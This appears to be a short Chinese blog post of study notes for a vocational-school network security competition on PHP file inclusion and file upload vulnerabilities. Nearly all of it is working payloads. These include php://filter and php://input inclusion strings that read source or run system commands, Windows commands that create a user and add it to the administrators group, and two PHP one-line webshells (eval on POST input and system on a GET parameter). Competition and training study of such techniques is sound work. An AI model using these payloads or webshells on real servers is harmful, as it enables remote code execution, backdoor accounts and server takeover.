全国职业院校技能大赛中职组网络安全竞赛试题 —文件包含漏洞与文件上传漏洞 (笔记文档)
全国职业院校技能大赛中职组网络安全竞赛试题 —文件包含漏洞与文件上传漏洞 (笔记文档)
中职网安 文件包含漏洞与文件上传漏洞 笔记
文件包含漏洞与文件上传漏洞
1.利用条件:allow_url_include = On
2.文件包含漏洞,?file=php://filter/read=convert.base64-encode/resource=index.php 可查看index.php文件的代码
3.文件包含漏洞,?file=php://input 再提交post数据 <?php system("ipconfig")?> 可执行系统cmd命令并查看
cmd部分提权常用命令:
whoami 查看当前用户
ipconfig 显示本地IP地址
net start telnet 开telnet服务
net user 查看所有用户列表
net user hucxsz hucxsz /add 添加用户hucxsz密码为hucxsz
net localgroup administrators hucxsz /add 将帐号hucxsz升级为管理员
文件上传:
php一句话木马<?php eval($_POST[hucys]);?>
cmd命令执行 <?php $rel = system($_GET['cmd']); echo $rel; ?>
有问题可以私信博主哈~~~~~
觉得有对你有帮助话给个一键三连(您的鼓励是我的动力)
祝大家身体健康万事如意!!!